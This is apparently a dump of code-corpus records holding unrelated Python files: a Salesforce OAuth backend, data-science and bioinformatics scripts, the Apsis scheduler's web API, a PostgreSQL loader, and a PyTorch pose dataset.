EXTRA_DATA = [\n ('user_id', 'user_id'),\n ('asserted_user', 'asserted_user'),\n ('organization_id','organization_id'),\n ('username','username'),\n ('display_name', 'display_name'),\n ('email', 'email'),\n ('status','status'),\n ('photos','photos'),\n ('urls','urls'),\n ('refresh_token', 'refresh_token', True),\n ]\n\n def get_user_id(self, details, response):\n return response['user_id']\n\n def get_user_details(self, response):\n \"\"\"Return user details from Salesforce account\"\"\"\n username = response['username']\n first_name = response['display_name'].split(' ')[0]\n last_name = response['display_name'].split(' ')[-1]\n email = response['email']\n return {\n 'username': username,\n 'first_name': first_name,\n 'last_name': last_name,\n 'email': email,\n }\n\n\nclass SalesforceAuth(BaseOAuth2):\n \"\"\"Salesforce OAuth mechanism\"\"\"\n AUTHORIZATION_URL = SALESFORCE_AUTHORIZATION_URL\n ACCESS_TOKEN_URL = SALESFORCE_ACCESS_TOKEN_URL\n AUTH_BACKEND = SalesforceBackend\n SETTINGS_KEY_NAME = 'SALESFORCE_CLIENT_ID'\n SETTINGS_SECRET_NAME = 'SALESFORCE_CLIENT_SECRET'\n # REDIRECT_STATE = False\n # STATE_PARAMETER = False\n\n def user_data(self, access_token, *args, **kwargs):\n \"\"\"Loads user data from service\"\"\"\n response = kwargs.get('response') or {}\n import urllib2\n headers = {'Authorization': 'Bearer ' + access_token}\n req = urllib2.Request(response.get('id'), headers=headers)\n try:\n return simplejson.load(urllib2.urlopen(req))\n except ValueError:\n return None\n\n\n# Backend definition\nBACKENDS = {\n 'salesforce': SalesforceAuth,\n}\n","sub_path":"social_auth/backends/contrib/salesforce.py","file_name":"salesforce.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
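A minimal sketch of the Django settings block that the salesforce backend's module docstring above describes. All values below are hypothetical placeholders; only the key names come from the record itself (SALESFORCE_TESTING is read via setting() with a False default, and the extra-arguments key is spelled exactly as in the docstring):

    # settings.py -- placeholder values only; key names taken from the salesforce backend above.
    SALESFORCE_CLIENT_ID = 'consumer-key-of-your-connected-app'        # placeholder
    SALESFORCE_CLIENT_SECRET = 'consumer-secret-of-your-connected-app'  # placeholder
    SALESFORCE_TESTING = False  # True switches the OAuth host to test.salesforce.com
    # Optional; 'id api refresh_token' is the documented default scope:
    SALESFORCE_AUTH_EXTRA_ARGUEMENTS = {'scope': 'id api refresh_token'}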
+{"seq_id":"128242935","text":"import pandas as pd \nimport numpy as np \nfrom sklearn.cluster import KMeans\ndf = pd.read_excel('titanic.xls')\ndf.drop(['body','name'],1,inplace = True)\ndf.convert_objects(convert_numeric= True)\ndf.fillna(0, inplace = True)\n# print(df.columns.values)\ndef handle_non_numerical_data(df):\n columns = df.columns.values\n for column in columns:\n x = 0\n digit_dict = {}\n def convert_to_int(val):\n return digit_dict[val]\n if df[column].dtype != np.float64 and df[column].dtype != np.int64:\n df_val = list(set(df[column]))\n for val in df_val:\n if val not in digit_dict:\n digit_dict[val] = x\n x += 1 \n # print(list(map(convert_to_int,df[column])))\n df[column] = list(map(convert_to_int,df[column])) \n return df\ndf = handle_non_numerical_data(df)\nX = np.array(df.drop(['survived'],1).astype(float))\ny = np.array(df['survived'])\nprint(X)\nprint(y)\nclf = KMeans(n_clusters=2)\nclf.fit(X)","sub_path":"Algorithm code/K-mean with titanic.py","file_name":"K-mean with titanic.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"29331909","text":"import os\nfrom Bio import SeqIO\n\nMainDir = '/home/deepti/Documents/test_data'\nOutDir = '/home/deepti/Documents/test_data_output'\n\n\nif os.path.exists(MainDir):\n\tfor d1 in os.listdir(MainDir): \n\n\t\tDir1 = os.path.join(MainDir, d1) \n\t\td ={}\n\t\tm ={}\n\t\tif os.path.exists(OutDir):\n\t\t\toutd1 = os.path.join(OutDir, d1)\n\t\t\tos.makedirs(outd1+'_output')\n\t\t\toutd2 = os.path.join(outd1+'_output')\n\t\t\toutputfasta = open(os.path.join(outd2, d1+'.fasta'), 'w')\n\t\t\toutputlog = open(os.path.join(outd2, d1+'.log.txt'), 'w')\n\t\n\t\t\t\n\t\t\tfor d2 in os.listdir(Dir1):\n\t\t\t\tDir2 = os.path.join(Dir1, d2)\n\t\t\t\t#print(Dir2)\n\t\t\t\tfor files in os.listdir(Dir2):\n\t\t\t\t\tfilePath= Dir2+\"/\"+files\n\t\t\t\t\t#print(filePath)\n\t\t\t\t\tfh = open(filePath)\n\t\t\t\t\tfor seq_record in SeqIO.parse(fh, 'fasta'):\n\t\t\t\t\t\tseq = str(seq_record.seq)\n\t\t\t\t\t\tif seq not in d:\n\t\t\t\t\t\t\td[seq] = []\n\t\t\t\t\t\td[seq].append(seq_record.id)\n\t\t\t\t\t\tlogVar=seq_record.id+\"\\t\"+files\n\t\t\t\t\t\t#print(logVar)\n\t\t\t\t\t\tif seq_record.id not in m:\n\t\t\t\t\t\t\tm[seq_record.id] = []\n\t\t\t\t\t\tm[seq_record.id].append(files)\n\t\t\t\tfh.close() #output.fasta\n\t\t\t\n\t\t\tfor seqs, ids in d.items(): \n\t\t\t\t#print(seqs,ids)\n\t\t\t\toutputfasta.write('>'+'#'.join(ids)+'\\n'+ seqs +'\\n')\n\t\t\t\t\n\t\t\tfor ids, filenames in m.items():\n\t\t\t\t#print(ids,filenames)\n\t\t\t\t#print(type(filenames))\n\t\t\t\t#uniqFileNames= list(set(filenames))\n\t\t\t\t#print(ids,\"\\t\",uniqFileNames)\n\t\t\t\toutputlog.write(ids+'\\t'+Dir2+'/'+','.join(filenames)+'\\n') \n","sub_path":"Parse_dict_fasta.py","file_name":"Parse_dict_fasta.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"369472323","text":"#!/usr/bin/env python\n\"\"\"Example process file.\"\"\"\n\nfrom mapchete import MapcheteProcess\nfrom shapely.geometry import shape\n\n\nclass Process(MapcheteProcess):\n \"\"\"Main process class.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Process initialization.\"\"\"\n # init process\n MapcheteProcess.__init__(self, **kwargs)\n self.identifier = \"my_process_id\",\n self.title = \"My long process title\",\n self.version = \"0.1\",\n self.abstract = \"short description on what my process 
does\"\n\n def execute(self):\n \"\"\"User defined process.\"\"\"\n # Reading and writing data works like this:\n with self.open(\"file1\") as vector_file:\n if vector_file.is_empty():\n # This assures a transparent tile instead of a pink error tile\n # is returned when using mapchete serve.\n return \"empty\"\n return [\n dict(\n geometry=feature[\"geometry\"],\n properties=dict(\n name=feature[\"properties\"][\"NAME_0\"],\n id=feature[\"properties\"][\"ID_0\"],\n area=shape(feature[\"geometry\"]).area\n )\n )\n for feature in vector_file.read()\n ]\n","sub_path":"test/testdata/geojson_test.py","file_name":"geojson_test.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"51160845","text":"import asyncio\nimport logging\nimport ora\nimport re\nimport sanic\nimport ujson\nfrom urllib.parse import unquote\nimport websockets\n\nfrom apsis.apsis import reschedule_runs\nfrom apsis.lib.api import response_json, error, time_to_jso, to_bool\nimport apsis.lib.itr\nfrom apsis.lib.timing import Timer\nfrom ..jobs import jso_to_job, reruns_to_jso\nfrom ..runs import Instance, Run, RunError\n\nlog = logging.getLogger(__name__)\n\n# Max number of runs to send in one websocket message.\nWS_RUN_CHUNK = 1024\nWS_RUN_CHUNK_SLEEP = 0.001\n\n#-------------------------------------------------------------------------------\n\nAPI = sanic.Blueprint(\"v1\")\n\n@API.exception(RunError)\ndef no_such_process_error(request, exception):\n return error(exception, status=400)\n\n\n#-------------------------------------------------------------------------------\n\ndef to_state(state):\n return None if state is None else Run.STATE[state]\n\n\ndef _to_jso(obj):\n return None if obj is None else {\n **obj.to_jso(),\n \"str\": str(obj),\n }\n\n\ndef _job_to_jso(app, job):\n return {\n \"job_id\" : job.job_id,\n \"params\" : list(sorted(job.params)),\n \"schedules\" : [ _to_jso(s) for s in job.schedules ],\n \"program\" : _to_jso(job.program),\n \"condition\" : [ _to_jso(c) for c in job.conds ],\n \"actions\" : [ _to_jso(a) for a in job.actions ],\n \"reruns\" : reruns_to_jso(job.reruns),\n \"metadata\" : job.meta,\n \"ad_hoc\" : job.ad_hoc,\n \"url\" : app.url_for(\"v1.job\", job_id=job.job_id),\n }\n\n\n# FIXME: Clean up, or put back caching.\n# No caching; jobs may change.\njob_to_jso = _job_to_jso\n\n\ndef _run_summary_to_jso(app, run):\n jso = run._jso_cache\n if jso is not None:\n # Use the cached JSO.\n return jso\n\n actions = {}\n # Start a scheduled job now.\n if run.state == run.STATE.scheduled:\n actions[\"cancel\"] = app.url_for(\"v1.run_cancel\", run_id=run.run_id)\n actions[\"start\"] = app.url_for(\"v1.run_start\", run_id=run.run_id)\n # Retry is available if the run didn't succeed.\n if run.state in {run.STATE.failure, run.STATE.error}:\n actions[\"rerun\"] = app.url_for(\"v1.run_rerun\", run_id=run.run_id)\n # Terminate and kill are available for a running run.\n if run.state == run.STATE.running:\n actions[\"terminate\"] = app.url_for(\n \"v1.run_signal\", run_id=run.run_id, signal=\"SIGTERM\")\n actions[\"kill\"] = app.url_for(\n \"v1.run_signal\", run_id=run.run_id, signal=\"SIGKILL\")\n\n jso = run._jso_cache = {\n \"url\" : app.url_for(\"v1.run\", run_id=run.run_id),\n \"job_id\" : run.inst.job_id,\n \"job_url\" : app.url_for(\"v1.job\", job_id=run.inst.job_id),\n \"args\" : run.inst.args,\n \"run_id\" : run.run_id,\n \"state\" : run.state.name,\n \"message\" : run.message,\n \"times\" : { n: time_to_jso(t) 
for n, t in run.times.items() },\n \"time_range\" : None if len(run.times) == 0 else [\n time_to_jso(min(run.times.values())),\n time_to_jso(max(run.times.values())),\n ],\n \"actions\" : actions,\n \"rerun\" : run.rerun,\n \"expected\" : run.expected,\n \"output_url\" : app.url_for(\"v1.run_output_meta\", run_id=run.run_id),\n \"labels\" : run.meta.get(\"labels\", []),\n }\n return jso\n\n\ndef run_to_jso(app, run, summary=False):\n if run.state is None:\n # This run is being deleted.\n # FIXME: Hack.\n return {\"run_id\": run.run_id, \"state\": None}\n\n jso = _run_summary_to_jso(app, run)\n\n if not summary:\n jso.update({\n \"conds\":\n [] if run.conds is None \n else [ _to_jso(c) for c in run.conds ],\n \"program\": None if run.program is None else run.program.to_jso(),\n # FIXME: Rename to metadata.\n \"meta\": run.meta,\n })\n\n return jso\n\n\ndef runs_to_jso(app, when, runs, summary=False):\n return {\n \"when\": time_to_jso(when),\n \"runs\": { r.run_id: run_to_jso(app, r, summary) for r in runs },\n }\n\n\ndef _output_metadata_to_jso(app, run_id, outputs):\n return [\n {\n \"output_id\": output_id,\n \"output_url\": app.url_for(\n \"v1.run_output\", run_id=run_id, output_id=output_id),\n \"output_len\": output.length,\n }\n for output_id, output in outputs.items()\n ]\n\n\n#-------------------------------------------------------------------------------\n# Jobs\n\nclass JobLookupError(LookupError):\n pass\n\n\n@API.exception(JobLookupError)\ndef job_lookup_error(request, exception):\n return error(exception, status=400)\n\n\nclass AmbiguousJobError(ValueError):\n pass\n\n\n@API.exception(AmbiguousJobError)\ndef ambiguous_job_error(request, exception):\n return error(exception, status=400)\n\n\ndef match(choices, target):\n \"\"\"\n Matches `target` to one of `choices`.\n\n Splits the target and each choice into words. 
Selects a choice such that\n each word in the target appears as a word in the choice, at least as a\n prefix.\n\n :return:\n The matching choice.\n \"\"\"\n REGEX = re.compile(r\"[^A-Za-z0-9]\")\n\n def words(target):\n return set(REGEX.split(target))\n\n target_words = words(target)\n\n def match(choice):\n choice_words = words(choice)\n return all(\n any( cw.startswith(sw) for cw in choice_words )\n for sw in target_words\n )\n\n choices = { c for c in choices if match(c) }\n\n if len(choices) == 0:\n raise JobLookupError(\"no job id match: \" + target)\n elif len(choices) == 1:\n return next(iter(choices))\n else:\n if len(choices) > 8:\n choices = \", \".join(list(choices)[: 8]) + \" …\"\n else:\n choices = \", \".join(choices)\n raise AmbiguousJobError(\"ambiguous job id: \" + choices)\n\n\ndef match_job_id(jobs, job_id):\n \"\"\"\n Matches `job_id` as an exact or fuzzy match.\n \"\"\"\n logging.info(f\"match_job_id {job_id}\")\n\n # Try for an exact match first.a\n try:\n jobs.get_job(job_id)\n except LookupError:\n pass\n else:\n return job_id\n\n # FIXME: Cache job ids (or word split job ids) to make this efficient.\n job_ids = [ j.job_id for j in jobs.get_jobs(ad_hoc=False) ]\n return match(job_ids, job_id)\n \n\n@API.route(\"/jobs/<job_id:path>\")\nasync def job(request, job_id):\n jobs = request.app.apsis.jobs\n try:\n job_id = match_job_id(jobs, unquote(job_id))\n except LookupError:\n return error(f\"no job_id {job_id}\", status=404)\n job = jobs.get_job(job_id)\n return response_json(job_to_jso(request.app, job))\n\n\n@API.route(\"/jobs/<job_id:path>/runs\")\nasync def job_runs(request, job_id):\n job_id = match_job_id(request.app.apsis.jobs, unquote(job_id))\n when, runs = request.app.apsis.run_store.query(job_id=job_id)\n jso = runs_to_jso(request.app, when, runs)\n return response_json(jso)\n\n\n@API.route(\"/jobs\")\nasync def jobs(request):\n \"\"\"\n Returns (non ad-hoc) jobs.\n \"\"\"\n jso = [ \n job_to_jso(request.app, j) \n for j in request.app.apsis.jobs.get_jobs(ad_hoc=False)\n ]\n return response_json(jso)\n\n\n#-------------------------------------------------------------------------------\n# Runs\n\n@API.route(\"/runs/<run_id>\", methods={\"GET\"})\nasync def run(request, run_id):\n try:\n when, run = request.app.apsis.run_store.get(run_id)\n except KeyError:\n return error(f\"unknown run {run_id}\", 404)\n \n jso = runs_to_jso(request.app, when, [run])\n return response_json(jso)\n\n\n@API.route(\"/runs/<run_id>/history\", methods={\"GET\"})\nasync def run_history(request, run_id):\n try:\n history = await request.app.apsis.get_run_history(run_id)\n except KeyError:\n return error(f\"unknown run {run_id}\", 404)\n\n return response_json({\n \"run_history\": [\n {\n \"run_id\" : r[\"run_id\"],\n \"timestamp\" : time_to_jso(r[\"timestamp\"]),\n \"message\" : r[\"message\"],\n }\n for r in history\n ]\n })\n\n\n@API.route(\"/runs/<run_id>/output\", methods={\"GET\"})\nasync def run_output_meta(request, run_id):\n try:\n outputs = request.app.apsis.outputs.get_metadata(run_id)\n except KeyError:\n return error(f\"unknown run {run_id}\", 404)\n\n jso = _output_metadata_to_jso(request.app, run_id, outputs)\n return response_json(jso)\n\n\n@API.route(\"/runs/<run_id>/output/<output_id>\", methods={\"GET\"})\nasync def run_output(request, run_id, output_id):\n try:\n data = request.app.apsis.outputs.get_data(run_id, output_id)\n except LookupError as exc:\n return error(exc, 404)\n else:\n return sanic.response.raw(data)\n\n\n@API.route(\"/runs/<run_id>/state\", 
methods={\"GET\"})\nasync def run_state_get(request, run_id):\n _, run = request.app.apsis.run_store.get(run_id)\n return response_json({\"state\": run.state})\n\n\n@API.route(\"/runs/<run_id>/cancel\", methods={\"POST\"})\nasync def run_cancel(request, run_id):\n state = request.app.apsis\n _, run = state.run_store.get(run_id)\n if run.state == run.STATE.scheduled:\n await state.cancel(run)\n return response_json({})\n else:\n return error(\"invalid run state for cancel\", 409, state=run.state)\n\n\n@API.route(\"/runs/<run_id>/start\", methods={\"POST\"})\nasync def run_start(request, run_id):\n state = request.app.apsis\n _, run = state.run_store.get(run_id)\n if run.state == run.STATE.scheduled:\n await state.start(run)\n return response_json({})\n else:\n return error(\"invalid run state for start\", 409, state=run.state)\n\n\n@API.route(\"/runs/<run_id>/rerun\", methods={\"POST\"})\nasync def run_rerun(request, run_id):\n state = request.app.apsis\n _, run = state.run_store.get(run_id)\n if run.state not in {run.STATE.failure, run.STATE.error, run.STATE.success}:\n return error(\"invalid run state for rerun\", 409, state=run.state)\n else:\n new_run = await state.rerun(run)\n jso = runs_to_jso(request.app, ora.now(), [new_run])\n # Let UIs know to show the new run.\n jso[\"show_run_id\"] = new_run.run_id\n return response_json(jso)\n\n\n# FIXME: PUT is probably right, but run actions currently are POST only.\n@API.route(\"/runs/<run_id>/signal/<signal>\", methods={\"PUT\", \"POST\"})\nasync def run_signal(request, run_id, signal):\n apsis = request.app.apsis\n _, run = apsis.run_store.get(run_id)\n\n if run.state not in {run.STATE.running}:\n return error(\"invalid run state for signal\", 409, state=run.state.name)\n assert run.program is not None\n\n apsis.run_history.info(run, f\"sending signal {signal}\")\n try:\n await run.program.signal(run.run_state, signal)\n except RuntimeError as exc:\n return error(str(exc), 400) # FIXME: code?\n return response_json({})\n\n\ndef _filter_runs(runs, args):\n \"\"\"\n Constructs a filter for runs from query args.\n \"\"\"\n try:\n run_id, = args[\"run_id\"]\n except KeyError:\n pass\n else:\n runs = ( r for r in runs if r.run_id == run_id )\n\n try:\n job_id, = args[\"job_id\"]\n except KeyError:\n pass\n else:\n runs = ( r for r in runs if r.inst.job_id == job_id )\n\n return runs\n\n\n@API.route(\"/runs\")\nasync def runs(request):\n apsis = request.app.apsis\n\n # Get runs from the selected interval.\n args = request.args\n summary, = args.pop(\"summary\", (\"False\", ))\n summary = to_bool(summary)\n run_ids = args.pop(\"run_id\", None)\n job_id, = args.pop(\"job_id\", (None, ))\n if job_id is not None:\n job_id = match_job_id(apsis.jobs, job_id)\n state, = args.pop(\"state\", (None, ))\n since, = args.pop(\"since\", (None, ))\n reruns, = args.pop(\"reruns\", (\"False\", ))\n\n when, runs = apsis.run_store.query(\n run_ids =run_ids, \n job_id =job_id,\n state =to_state(state),\n since =since, \n reruns =to_bool(reruns),\n )\n\n return response_json(runs_to_jso(request.app, when, runs, summary=summary))\n\n\n@API.websocket(\"/ws/runs\")\nasync def websocket_runs(request, ws):\n since, = request.args.pop(\"since\", (None, ))\n\n log.info(\"live runs connect\")\n with request.app.apsis.run_store.query_live(since=since) as queue:\n while True:\n # FIXME: If the socket closes, clean up instead of blocking until\n # the next run is available. Not sure how to do this. 
ws.ping()\n # with a timeout doesn't appear to work.\n next_runs = [await queue.get()]\n # Drain the queue.\n while True:\n try:\n next_runs.append(queue.get_nowait())\n except asyncio.QueueEmpty:\n break\n\n if any( r is None for r in next_runs ):\n # Signalled to shut down.\n await ws.close()\n break\n\n when = next_runs[-1][0]\n assert all( w <= when for w, _ in next_runs )\n runs = apsis.lib.itr.chain.from_iterable( r for _, r in next_runs )\n runs = _filter_runs(runs, request.args)\n\n # Break large sets into chunks, to avoid block for too long.\n chunks = list(apsis.lib.itr.chunks(runs, WS_RUN_CHUNK))\n if len(chunks) == 0:\n continue\n\n try:\n for chunk in chunks:\n with Timer() as timer:\n jso = runs_to_jso(request.app, when, chunk, summary=True)\n # FIXME: JSOs are cached but ujson.dumps() still takes real\n # time.\n json = ujson.dumps(jso)\n log.debug(f\"sending {len(chunk)} runs, {len(json)} bytes {timer.elapsed:.3f} s: {request.socket}\")\n await ws.send(json)\n await asyncio.sleep(WS_RUN_CHUNK_SLEEP)\n except websockets.ConnectionClosed:\n break\n\n log.info(\"live runs disconnect\")\n\n\n@API.route(\"/runs\", methods={\"POST\"})\nasync def run_post(request):\n apsis = request.app.apsis\n\n # The run may either contain a job ID, or a complete job.\n jso = request.json\n if \"job\" in jso:\n # A complete job.\n job = jso_to_job(jso[\"job\"], None)\n job.ad_hoc = True\n request.app.apsis.jobs.add(job)\n job_id = job.job_id\n\n elif \"job_id\" in jso:\n # Just a job ID.\n job_id = match_job_id(apsis.jobs, jso[\"job_id\"])\n\n else:\n return error(\"missing job_id or job\")\n\n run = Run(Instance(job_id, jso.get(\"args\", {})))\n request.app.apsis._validate_run(run)\n\n time = jso.get(\"times\", {}).get(\"schedule\", \"now\")\n time = None if time == \"now\" else ora.Time(time)\n await apsis.schedule(time, run)\n jso = runs_to_jso(request.app, ora.now(), [run])\n return response_json(jso)\n \n\n# FIXME: Is there a need for this?\n@API.route(\"/runs/reschedule/<job_id:path>\", methods={\"POST\"})\nasync def runs_reschedule_post(request, job_id):\n await reschedule_runs(request.app.apsis, job_id)\n return response_json({})\n\n\n","sub_path":"python/apsis/service/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":15259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"585100361","text":"import datetime\nimport psycopg2\nimport json\nfrom django.conf import settings\nfrom os.path import basename\nimport redis\n\n\nclass DataFile(object):\n\n def save_to_database(self, project_id, vendor, network, file_type, description, filename, task_id):\n r = redis.StrictRedis(host=settings.REDIS, port=6379, db=0)\n conn = psycopg2.connect(\n 'host = %s dbname = %s user = %s password = %s' % (\n settings.DATABASES['default']['HOST'],\n settings.DATABASES['default']['NAME'],\n settings.DATABASES['default']['USER'],\n settings.DATABASES['default']['PASSWORD']))\n cursor = conn.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS Universal3g3gNeighbors (\n filename TEXT,\n rncSource TEXT,\n utrancellSource TEXT,\n carrierSource TEXT,\n rncTarget TEXT,\n utrancellTarget TEXT,\n carrierTarget TEXT\n )''')\n cursor.execute('CREATE TABLE IF NOT EXISTS data_table (id SERIAL, project_id INT, filename TEXT, table_name TEXT, row JSONB)')\n cursor.execute('DELETE FROM data_table WHERE (project_id=%s) AND (filename=%s)', (project_id, basename(self.filename)))\n s = len(self.data)\n i = 0\n file_tables = set()\n for row in self.data:\n 
table_name = row.get('data_type')\n                file_tables.add(row.get('data_type'))\n                del row['data_type']\n                cursor.execute('INSERT INTO data_table (project_id, filename, table_name, row) VALUES (%s, %s, %s, %s)', (project_id, filename, table_name, json.dumps(row, encoding='latin1')))\n                i += 1\n                r.set(task_id, '%s, writing' % int(float(i) / float(s) * 100))\n\n        r.set(task_id, '100, writing')\n        file_tables = list(file_tables)\n        file_tables.sort()\n        cursor = conn.cursor()\n        cursor.execute('DELETE FROM files_files WHERE (project_id=%s) AND (filename=%s)', (project_id, basename(self.filename)))\n        cursor.execute('INSERT INTO files_files (filename, date, tables, excel_filename, archive, file_type, description, vendor, network, project_id) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)', (\n            filename,\n            datetime.datetime.now(),\n            ','.join(file_tables),\n            '',\n            '',\n            file_type,\n            description,\n            vendor,\n            network,\n            project_id))\n        conn.commit()\n        r.set(task_id, 'done')","sub_path":"files/data_file.py","file_name":"data_file.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"357916803","text":"\n\n#class header\nclass _MILDEW():\n\tdef __init__(self,): \n\t\tself.name = \"MILDEW\"\n\t\tself.definitions = [u'a black, green, or whitish area caused by a fungus that grows on things such as plants, paper, cloth, or buildings, usually if the conditions are warm and wet: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_mildew.py","file_name":"_mildew.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"17590539","text":"\"\"\"\n real-time joints definition: \n    (0-'nose'\t1-'neck' 2-'right_shoulder' 3-'right_elbow' 4-'right_wrist'\n     5-'left_shoulder' 6-'left_elbow'\t 7-'left_wrist' 8-'right_hip'\n     9-'right_knee'\t 10-'right_ankle'\t11-'left_hip' 12-'left_knee'\n     13-'left_ankle'\t 14-'right_eye'\t 15-'left_eye' 16-'right_ear'\n     17-'left_ear' )\n    \n\"\"\"\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader, Dataset\n\n# from PIL import Image\n# from PIL import ImageDraw\nimport cv2\nimport os\nimport numpy as np\nimport json\n\nimport util\n\nclass ClothesDataset(Dataset):\n    def __init__(self, opt):\n        super(ClothesDataset,self).__init__()\n        self.opt = opt\n        self.root = opt.root # data root\n        self.mode = opt.mode # train or test\n        self.path = self.root \n        self.datalist = opt.datalist # pair data\n        self.w = opt.w # 192\n        self.h = opt.h # 288\n        self.radius = opt.radius # 3\n        \n        self.transform = transforms.Compose([\n                # transforms.Resize((self.h, self.w)),\n                transforms.ToTensor(), # [0, 255]->[0.0, 1.0]\n                transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]) # [0.0, 1.0]->[-1.0, 1.0]\n\n        human1_names = []\n        human2_names = []\n        c_names = []\n        \n        # Load data into human1, human2, clothing names from path\n        with open(os.path.join(self.path, self.datalist), \"r\") as f:\n            for line in f.readlines():\n                line = line.strip(\"\\n\")\n                c_names.append(line)\n                human1_names.append(line.replace(\".jpg\", \"_0.jpg\"))\n                human2_names.append(line.replace(\".jpg\", \"_1.jpg\"))\n\n        self.c_names = c_names\n        self.human1_names = human1_names\n        self.human2_names = human2_names\n\n    def __len__(self):\n        return 
len(self.c_names)\n \n def transform_keypoints(self, pose_label):\n # body parts*(x, y, probability)\n pose_data = np.zeros((18, 3))\n for part in pose_label:\n body = int(part[-1])\n if pose_data[body, 2] < part[2]:\n pose_data[body, 0] = part[0]\n pose_data[body, 1] = part[1]\n pose_data[body, 2] = part[2]\n \n return pose_data\n \n def transform_pose(self, human_pose):\n # r = self.radius\n sigma = self.radius\n point_num = human_pose.shape[0]\n # pose_map = torch.zeros(point_num, self.h, self.w)\n # pose_img = Image.new('L', (self.w, self.h))\n # pose_draw = ImageDraw.Draw(pose_img)\n pose_map = np.zeros((point_num, self.h, self.w))\n for i in range(point_num):\n # one_map = Image.new('L',(self.w, self.h))\n # draw = ImageDraw.Draw(one_map)\n px = human_pose[i, 0]\n py = human_pose[i, 1]\n if px > 1 and py > 1:\n one_heatmap = util.makeGaussian([self.h, self.w], sigma, [px, py])\n pose_map[i] = one_heatmap\n pose_map = torch.from_numpy(pose_map) # [0,1]\n\n # pose_img = np.array(pose_img)/255\n # pose_img = torch.from_numpy((pose_img-0.5)*2)\n return pose_map\n \n def __getitem__(self, index):\n # Load human 1,2 and clothing\n h1_name = self.human1_names[index]\n h2_name = self.human2_names[index]\n c_name = self.c_names[index]\n\n # c = Image.open(os.path.join(self.path, \"clothes\", c_name)).convert('RGB')\n c = cv2.imread(os.path.join(self.path, \"clothes\", c_name)) # B,G,R order\n c = self.transform(c)/2\n\n h1 = cv2.imread(os.path.join(self.path, \"human\", h1_name))\n h1 = self.transform(h1)/2\n h2 = cv2.imread(os.path.join(self.path, \"human\", h2_name))\n h2 = self.transform(h2)/2\n\n # # Load human pose points from json files\n human1_pose_name = h1_name.replace('.jpg', '_keypoints.json')\n with open(os.path.join(self.path, \"human_pose\", human1_pose_name), \"r\") as f:\n pose_label = json.load(f)\n human1_pose = self.transform_keypoints(pose_label)\n human1_pose_map = self.transform_pose(human1_pose)\n human1_pose = torch.from_numpy(human1_pose)\n\n human2_pose_name = h2_name.replace('.jpg', '_keypoints.json')\n with open(os.path.join(self.path, \"human_pose\", human2_pose_name), \"r\") as f:\n pose_label = json.load(f)\n human2_pose = self.transform_keypoints(pose_label)\n human2_pose_map = self.transform_pose(human2_pose)\n human2_pose = torch.from_numpy(human2_pose)\n \n result = {\n \"human1_name\": h1_name,\n \"human2_name\": h2_name,\n \"c_name\": c_name,\n \"clothes\": c,\n \"human1\": h1,\n \"human2\": h2,\n \"human1_pose\": human1_pose,\n \"human2_pose\": human2_pose,\n \"human1_pose_map\": human1_pose_map,\n \"human2_pose_map\": human2_pose_map,\n }\n \n return result\n\nif __name__ == \"__main__\":\n \n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--root\", default=\"../data\")\n parser.add_argument(\"--mode\", default=\"try\")\n parser.add_argument(\"--datalist\", default=\"all_files.txt\")\n parser.add_argument(\"--radius\", default=8)\n parser.add_argument(\"--w\", default=192)\n parser.add_argument(\"--h\", default=288)\n parser.add_argument(\"--batch_size\", default=2)\n parser.add_argument(\"--parse_channel\", default=20)\n opt = parser.parse_args()\n \n dataset = ClothesDataset(opt)\n # dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=True, pin_memory=True)\n dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=True)\n print('Size of the dataset: %d, dataloader: %d' %(len(dataset), len(dataloader)))\n # item = dataset.__getitem__(0)\n\n data_iter = iter(dataloader)\n batch = 
next(data_iter)\n\n c = batch['clothes']\n h1 = batch['human1']\n h2 = batch['human2']\n h1_p = batch['human1_pose']\n h2_p = batch['human2_pose']\n h1_pm = batch['human1_pose_map']\n h2_pm = batch['human2_pose_map']\n","sub_path":"ClothesDataset.py","file_name":"ClothesDataset.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"15255067","text":"#\n# @lc app=leetcode id=85 lang=python3\n#\n# [85] Maximal Rectangle\n#\n# https://leetcode.com/problems/maximal-rectangle/description/\n#\n# algorithms\n# Hard (32.58%)\n# Total Accepted: 114.8K\n# Total Submissions: 351.3K\n# Testcase Example: '[[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]]'\n#\n# Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle\n# containing only 1's and return its area.\n# \n# Example:\n# \n# \n# Input:\n# [\n# [\"1\",\"0\",\"1\",\"0\",\"0\"],\n# [\"1\",\"0\",\"1\",\"1\",\"1\"],\n# [\"1\",\"1\",\"1\",\"1\",\"1\"],\n# [\"1\",\"0\",\"0\",\"1\",\"0\"]\n# ]\n# Output: 6\n# \n# \n#\nfrom 